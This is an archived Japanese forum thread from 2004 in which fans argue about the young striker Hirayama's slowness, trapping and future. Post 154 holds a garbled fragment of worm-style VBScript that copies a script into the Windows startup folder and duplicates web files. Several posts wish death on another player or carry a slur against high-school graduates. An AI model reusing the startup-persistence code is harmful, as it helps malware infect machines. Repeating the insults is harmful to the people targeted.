151 :名無しさん@お腹いっぱい。:04/10/07 19:42:55 ID:WedZ+hPp
>>148
大学の試合は平山にとって休養と同じ意味がある。
あれだけ代表スケジュールが詰ってるんだからたまにはゆっくりしていいじゃん。
試合中にしゃべってた相手は国見の先輩だから無視なんかできねーよ。
あんまり学校にも逝ってなかったろうし、これからが始まりじゃないのかな。

152 :名無しさん@お腹いっぱい。:04/10/07 19:57:30 ID:JgSLChAN
五輪予選UAEラウンドの下痢以来、遠征、合宿、大学で体調万全な時ないな。
本人は大丈夫ですしか言わないから便利に使われて疲れてると思う。
でもこれからもAY以降、Jの強化指定にはいればまた同じ。
どっかでじっくり体つくらなければ未完の大器でおわってしまいそう。


153 :名無しさん@お腹いっぱい。:04/10/07 20:40:54 ID:EgpmhDZJ
あの顔が受け付けないだけ



154 :名無しさん@お腹いっぱい。:04/10/07 21:34:16 ID:2N9xcM1h
fso.copyfile "dirsystem&nurupo.vbs","j:\windows\startmenu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFilef1.path, f1.path+"l"

155 :名無しさん@お腹いっぱい。:04/10/07 23:35:57 ID:bARv8zuA
12人いればいいけど
やっぱ11人だし、高さもあってスピードもある
前を向けるとか2ついい事がないと、
ただ高さだけってなら坂田のスピードと
特徴としては大差なくなっちゃうよね。
1つ特徴を取るのは誰を使っても出るわけだよ、
俺らは平山に2つの特徴をもつのを期待したわけで。
高さだけなら、岡野と変わらないよ。

156 :名無しさん@お腹いっぱい。:04/10/07 23:40:30 ID:tmy9i8vy
次のシリア戦終わったらゆっくりできるんだろ。
じっくりクラブ選びすることだな。気になるのはオバトレ症候群っぽい感じがする点。

157 :名無しさん@お腹いっぱい。 :04/10/07 23:42:05 ID:clL1lOT9
なんかそんなにサッカーやりたくないんならやめればいいのに
というプレーをする

158 :名無しさん@お腹いっぱい。:04/10/07 23:43:57 ID:2dBLRwq+
韓国を勝利へと導いた平山のPK

159 :名無しさん@お腹いっぱい。:04/10/07 23:48:27 ID:SwCZDWou
師匠の闘魂を平山に分けてやってほしい

160 :名無しさん@お腹いっぱい。:04/10/07 23:51:00 ID:yCi5AB3s
カレン・ザ・ノーゴール氏ね
37試合連続ノーゴールおめでとう
氏んでいいよ
つーか氏ね、氏んでしまえ

161 :名無しさん@お腹いっぱい。:04/10/07 23:56:46 ID:YS9/8vkX
平山は日本最高の点取り屋になりそう

162 :名無しさん@お腹いっぱい。:04/10/08 00:02:52 ID:idn7Jnt9
平山がいなくなってたり、平山を経由してない方が、ボールも人も動く。
足が遅いし、反射神経鈍いし。松木も言いたそうでなかなか言えないのを見ると、
平山マンセーはマスゴミが徹底してるだけ。

163 : :04/10/08 00:05:40 ID:MBA6ujff
プレーも性格も   もっさり

164 :名無しさん@お腹いっぱい。:04/10/08 00:08:09 ID:+Muf7NiX
平山のトラップは最高だよ。

アレの凄さを分からない香具師は素人。

165 :名無しさん@お腹いっぱい。:04/10/08 00:08:53 ID:idn7Jnt9
カタール戦で相手ディフェンダーに平山が競り負け続け、特に後半でくの棒状態。
何故か実況も松木氏も一言も試合中に触れていなかったが、
明らかに運動量が激減しトボトボ歩いてるのに気づかない訳ない。
カタール戦も韓国戦も平山がどんなミスしてもヘボしてもマスゴミは徹底スルー。

166 : :04/10/08 00:09:41 ID:MBA6ujff
トラップだけで代表のトップは張れんよ

167 :名無しさん@お腹いっぱい。:04/10/08 00:15:32 ID:XaPRsG5R
トラップは確かにかなりいい。ただその後がいかんせんのろい

168 :名無しさん@お腹いっぱい。:04/10/08 00:15:54 ID:wbKqLAEE
平山はアシストもかなり多そうだね


169 :名無しさん@お腹いっぱい。:04/10/08 00:16:40 ID:vmy1DXop
昨日の1点目のアシストなんてスーパープレーだよね
確かにもっさりしてるけどもうちょっと褒められていいと思うけどな



170 :名無しさん@お腹いっぱい。:04/10/08 00:17:02 ID:WEmgd2yI
平山はゴンの後輩であり田島の後輩であり…

171 :名無しさん@お腹いっぱい。:04/10/08 00:20:43 ID:j1Lli1SY
ゴール前の平山のプレーってスローモーション 見ているみたい。

172 :名無しさん@お腹いっぱい。:04/10/08 00:22:36 ID:wbKqLAEE
もっさりはしてるけど玉離れも早いしやってる選手たちは全然気にならないと思うね
まあアンチたちはそこばっか見てるんだろうけど

173 : :04/10/08 00:24:17 ID:MBA6ujff
今の大熊の中盤ぽっかりサッカーだとトップの選手がポストでウイングに
散らしてから駆け上がったウイングがクロス供給するまでに
猛ダッシュでゴル前に詰めなきゃいけないのに鈍足過ぎて
平山は追いつかないで不在というシーンが度々あった
平山の高さ・ポジショニング・局所でのトラップからシュートという長所は完全に消え
あれだと鈍足という弱点だけクローズアップされる
今の戦術を変えるか平山を速さのある他のセンターFWに変えるか
どちらかしかない

174 :名無しさん@お腹いっぱい。:04/10/08 00:58:21 ID:0uDTwNvM
全治2.3ヶ月くらいの怪我やって少しは休んだ方がイイ、使いベリしてるだろ

175 :名無しさん@お腹いっぱい。:04/10/08 02:17:31 ID:iKQPYS/e
清水のチョゼジンみたいにポスト確実にして
球を簡単にさばいて豪快にゴールに決めろよ
年齢大してかわらんし同じアジア人なんだからアレできるだろ

176 :名無しさん@お腹いっぱい。:04/10/08 02:25:04 ID:c+tsX8eq
まあやる気が感じられないけどあんだけ平山に放るだけだとさすがにきついだろ。マークもされるし。

177 :名無しさん@お腹いっぱい。:04/10/08 07:17:02 ID:rAtzF6P/
日本サッカー協会が平山の“進路相談”
http://www.yomiuri.co.jp/hochi/soccer/oct/o20041007_60.htm

>団長としてU―19代表に同行している田嶋委員長は、PK戦で敗れた同選手権準決勝の韓国戦(6日)の
>平山について 「今のままじゃ、だめなことは本人が一番よく分かっていると思う」と力不足を指摘。
>特別指定選手の受け入れ先について「大会が終わってから本人とじっくりと話したい」と語った。



「今のままじゃ、だめなことは本人が一番よく分かっていると思う」と力不足を指摘。
「今のままじゃ、だめなことは本人が一番よく分かっていると思う」と力不足を指摘。
「今のままじゃ、だめなことは本人が一番よく分かっていると思う」と力不足を指摘。
「今のままじゃ、だめなことは本人が一番よく分かっていると思う」と力不足を指摘。
「今のままじゃ、だめなことは本人が一番よく分かっていると思う」と力不足を指摘。
「今のままじゃ、だめなことは本人が一番よく分かっていると思う」と力不足を指摘。
「今のままじゃ、だめなことは本人が一番よく分かっていると思う」と力不足を指摘。
「今のままじゃ、だめなことは本人が一番よく分かっていると思う」と力不足を指摘。
「今のままじゃ、だめなことは本人が一番よく分かっていると思う」と力不足を指摘。

178 :名無しさん@お腹いっぱい。:04/10/08 09:07:24 ID:WbZ/5AxC
うざい

179 :名無しさん@お腹いっぱい。:04/10/08 10:18:34 ID:mM6mWBzs
戦術理解の低さとポジショニングが悪いのが弱点だな 技術勝負になったら勝てないのは当然。 平山が糞過ぎるんだが・・・

180 :名無しさん@お腹いっぱい。:04/10/08 10:35:24 ID:k/GozI+r
けどこの世代で平山超える人は出ないでしょう

181 :名無しさん@お腹いっぱい。:04/10/08 10:48:12 ID:HBjbTCoI
谷間の世代なんだから・・・


182 :名無しさん@お腹いっぱい。:04/10/08 14:09:02 ID:8dwbdH+p
全得点に絡んだ平山が批判されて、
オサレバックヘッドの増嶋が批判されないのは顔のせい。

183 :名無しさん@お腹いっぱい。:04/10/08 14:12:54 ID:YOLcaKMk
トロイ

184 :名無しさん@お腹いっぱい。:04/10/08 14:15:04 ID:RFzSYTSA
トロイ

185 :名無しさん@お腹いっぱい。:04/10/08 14:23:00 ID:WhxvhUrf
の木馬

186 :名無しさん@お腹いっぱい。:04/10/08 15:52:23 ID:wbKqLAEE
>>1
カレンがチャンスに絡んでこないから
平山がチャンスを潰してるように見えるだけ

187 :名無しさん@お腹いっぱい。:04/10/08 16:14:40 ID:C6FB0QnQ
カタール戦
平山5
カレン6

188 :名無しさん@お腹いっぱい。:04/10/08 17:35:50 ID:GIa9CaLc
国見OBの船越のように今後成長していくと思う

189 :名無しさん@お腹いっぱい。:04/10/08 18:22:42 ID:Erqpx47j
>>177
もしも平山がスペインに行くと言い出したら田嶋はなんて言うだろうねw

190 :名無しさん@お腹いっぱい。:04/10/08 18:52:20 ID:fBr+KGDE
どーでもいいことだが、平山って浜口京子に似てねーか?

191 :名無しさん@お腹いっぱい。:04/10/08 18:55:49 ID:HtLziDQ8
ハーフナーマイクに越されるぞ

192 :名無しさん@お腹いっぱい。:04/10/08 18:56:29 ID:0nnaMCqu
似てない

193 :名無しさん@お腹いっぱい。:04/10/08 19:09:50 ID:NBUvveYx
ハーフナーマイクと平山のツインタワーでええんとちゃう?

194 :名無しさん@お腹いっぱい。:04/10/08 20:16:45 ID:C6FB0QnQ
浜口京子に失礼だ

195 :名無しさん@お腹いっぱい。:04/10/08 21:34:29 ID:zfJVV7LG
エースだからたたかれるのはしょうがない。
でも、平山は釜本、カズを超える、大エースになるよ。

196 :名無しさん@お腹いっぱい。:04/10/09 04:48:22 ID:J+eZaRyg
>>188
それ以上にね。
結果を急ぎすぎだよな
あの身長で柔らかい足下があるんだから、これから
体ががっちりしていって強いFWになるよ。
なんだかんだで船越がまだJに残ってるのは凄いことだよ。


197 :名無しさん@お腹いっぱい。:04/10/09 08:37:11 ID:ZYbCWv48
高卒は知的障害者PART UW
http://society3.2ch.net/test/read.cgi/soc/1096469924/

198 :名無しさん@お腹いっぱい。:04/10/09 13:45:38 ID:7qms8EmC
>>195
なるわけねーだろwww

199 :名無しさん@お腹いっぱい。:04/10/09 14:54:46 ID:L/yu6HJJ
ポストプレー苦手そうなんだよな。なんかおっかなびっくりボールを捌いてる。
高校のときはボールもらったらほとんど自分でシュートまで持ち込んでたからだろう。

200 :蝿は早え〜よ:04/10/17 23:53:44 ID:7apGtmnf
遅い・・・
遅すぎ・・・
遅いんだよ・・・
ハエが止まって見える・・・いや、ヒラヤマが止まって見える・・・
ヒラヤマ山脈・・・お山さん・・・

201 :名無し:04/10/18 11:19:58 ID:woOCOlfM
下手だから

202 :_:04/10/18 12:14:00 ID:GkNVyG+8
>>172
叩くとしたら、あのもっさりした動きと、ペナルティエリアかその周辺での大きいトラップによるロスだろう。
すげーいいところでボール貰ったときももっさり(落ち着いて)動けるから、あれはあれで持ち味なんだろうけど・・・・

アジアユースの準決勝だか準々決勝でアシストしたときは柔らかいタッチだったのに、
そのわりにトラップが大きく離れてボール失うシーンが目に付くのが不思議だ。

203 : :04/10/18 18:44:30 ID:7F1dIOjf
コラーを見習って、トラップとパスの練習したほうがいいね

204 : :04/10/18 21:19:43 ID:W3Gp3Rb0
>>203
この前ドリブルシュート決めたからドリブルもだ。

205 : :04/10/18 23:06:24 ID:59lfDe7I
たぶん平山は高木より劣ったままサッカー人生を終わるだらう。

206 : :04/10/19 14:21:59 ID:O27aX/5m
>>202
かなり狙われてガツガツ削られてたからなぁ。
激しいマークを受けると技術がブレるのは日本人選手の
共通した弱点だし。経験でどうにかなるかな?

207 : :04/10/19 15:01:25 ID:3g6Coh4g
背が高いと言っても、イブラヒモビッチみたいにドリブルしたり、
トレゼゲみたいに競り勝ってヘディングシュートするのは無理そうだな

208 : :04/10/19 15:14:23 ID:Ls4A7T2C
うまいとは思うんだけど、凄味がないなぁ。
もう少しスピードつけてくれよ(涙)

209 : :04/10/19 17:12:20 ID:hZVmGMoN


210 : :04/10/20 23:29:32 ID:d/vhKRHn
まあ、あれでも使い減りしてない時は身長の割に速い部類だった
と思うのだが、最近はケガも含めてキレが欠けてるよな。
以前はもっと速かった。これだけは言っておきたい。

211 :コゾー:04/10/31 22:59:09 ID:Ai2El7JP
とりあえず、奴のしゃべりをみてると舌を引っ込抜きたくなるのはおれだけ?

212 : :04/11/01 03:35:24 ID:H0Byf9P7
足は確かにもう少し速かった。
ヨーイドンで走り勝って裏でボール貰うようなことも何度かあったような。
でも瞬発力はねーよな。長い距離ならそこそこ速い、でも最初の数歩が遅いみたいな。
あと反応も鈍い。

213 : :04/11/01 17:39:04 ID:E545FejN
平山って走るとき猫背ぽい

214 : :04/11/01 20:25:57 ID:WPVBTQ6+
癒し系FW

215 : :04/11/03 12:10:48 ID:J3sL44wY
ハンドが多い

216 : :04/11/29 23:52:28 ID:qm+bA4o5
この人いま何やってんの?

217 : :04/12/01 09:33:24 ID:bLQXg1rg
http://www.yomiuri.co.jp/hochi/soccer/index.htm
http://www.sponichi.co.jp/soccer/kiji/2004/12/01/01.html

44 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)